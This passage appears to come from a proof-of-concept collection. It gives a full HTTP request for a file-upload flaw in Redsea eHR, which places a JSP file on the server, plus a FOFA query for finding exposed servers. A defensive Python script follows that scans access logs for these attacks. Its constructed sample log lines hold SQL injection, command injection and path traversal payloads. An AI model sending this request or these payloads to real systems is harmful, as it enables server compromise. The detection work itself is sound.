2 v- Z8 z6 R! v2 }5 x# ]; U+ I* y
203. 红海云EHR (Redsea eHR) PtFjk file upload
FOFA: body="RedseaPlatform"
The fj_file part is stored under its original filename (11.jsp) even though the part declares image/jpeg, so the type header is not a control.

POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: your-ip
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
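The article's stated purpose is to let defenders check their exposure, and the quickest retrospective check is the web access log. The script below is an added example (not code from the original article or from any vendor) that encodes only the request-line indicators visible in entries 189 to 203 and runs them over constructed sample log lines in the common/combined format. A hit tagged "exploit" means the payload itself is in the URL (entries where the injection or traversal rides in the request target); a hit tagged "endpoint" only shows that a POC endpoint was posted to, because access logs do not record POST bodies, so those need the body from a WAF or proxy capture before they count as an attack. The target is URL-decoded until stable so double encoding does not hide a payload, and the rule for entry 192 generalizes the published name=.ashx to any name that is nothing but an extension.

```python
"""Access-log triage for the POC request lines in entries 189 to 203.

Added example; not code from the original article or any vendor. SAMPLE_LOG
is constructed. "exploit" = payload visible in the request target;
"endpoint" = POC endpoint hit, body needed to confirm (not in access logs).
"""
import re
import urllib.parse
from collections import namedtuple

# Common/combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

Rule = namedtuple("Rule", "entry level methods pattern")


def _r(entry, level, methods, pattern):
    return Rule(entry, level, methods, re.compile(pattern))


# Patterns run against the fully URL-decoded, lower-cased request target.
RULES = [
    _r("189", "exploit", ("GET",), r"/xds/deletestudy\.php\?.*(waitfor\s+delay|sleep\(|')"),
    _r("190", "endpoint", ("POST",), r"/index\.php/admin/userinfo/poihuoqu"),
    _r("191", "exploit", ("POST",), r"/cdgserver3/.*/\.\./navigationajax"),
    _r("192", "exploit", ("POST",), r"/joinfapp/email/uploademailattr\?.*name=\.[a-z0-9]+(&|$)"),
    _r("193", "endpoint", ("POST",), r"/master/ajaxactions/setsystemtimeaction\.php"),
    _r("194", "endpoint", ("POST",), r"/servlet/uploadattachmentservlet"),
    _r("195", "endpoint", ("POST",), r"/send_order\.cgi\?parameter=operation"),
    _r("196", "endpoint", ("POST",), r"/cas/userctl/resetpasswordbysuper"),
    _r("197", "exploit", ("GET",), r"/entsoft/quotegask_editaction\.entweb;.*goonumstr=.*('|union|select)"),
    _r("198", "exploit", ("GET",), r"/aliyundrive-webdav/query\?.*sid=[^&]*[`$;|]"),
    _r("199", "endpoint", ("POST",), r"/assetsmanager/upload"),
    _r("200", "exploit", ("GET",), r"/dmplayer/dmku/\?.*id=.*(sleep\(|select|')"),
    _r("201", "endpoint", ("POST",), r"/newsedit/newsplan/task/binary\.do"),
    _r("202", "endpoint", ("POST",), r"/user/accountedit\.aspx"),
    _r("203", "endpoint", ("POST",), r"/redseaplatform/ptfjk\.mob\?.*method=upload"),
]


def decode_target(target):
    """URL-decode until stable so double-encoded payloads (%2527) still surface."""
    decoded = target
    while True:
        nxt = urllib.parse.unquote_plus(decoded)
        if nxt == decoded:
            return decoded.lower()
        decoded = nxt


def match_line(line):
    """Entries whose indicator matches this log line, as (entry, level) pairs."""
    m = LOG_RE.match(line)
    if not m:
        return []
    target = decode_target(m["target"])
    return [(r.entry, r.level) for r in RULES
            if m["method"] in r.methods and r.pattern.search(target)]


def scan(lines):
    """(line_number, client_ip, hits) for every line that matched at least one rule."""
    report = []
    for number, line in enumerate(lines, 1):
        hits = match_line(line)
        if hits:
            report.append((number, line.split(" ", 1)[0], hits))
    return report


# Constructed sample: six POC-shaped requests and two benign ones (lines 2 and 6).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2024:10:01:02 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 312',
    '10.0.0.5 - - [12/May/2024:10:01:09 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1 HTTP/1.1" 200 312',
    '10.0.0.6 - - [12/May/2024:10:02:00 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 88',
    '10.0.0.7 - - [12/May/2024:10:03:10 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60ls%20/%3E/www/aaa.txt%60%20 HTTP/1.1" 200 15',
    '10.0.0.8 - - [12/May/2024:10:04:00 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 41',
    '10.0.0.9 - - [12/May/2024:10:05:00 +0800] "GET /User/AccountEdit.aspx HTTP/1.1" 200 5120',
    '10.0.0.9 - - [12/May/2024:10:05:03 +0800] "POST /User/AccountEdit.aspx HTTP/1.1" 302 0',
    '10.0.0.10 - - [12/May/2024:10:06:00 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, ip, hits in scan(SAMPLE_LOG):
        print(number, ip, hits)
```

Servers usually log the request line verbatim, which is why the /js/../ traversal of entry 191 and the ;.js suffix of entry 197 are still visible; behind a reverse proxy that normalizes paths before logging, those two rules will not fire and the endpoint-only form has to be used instead.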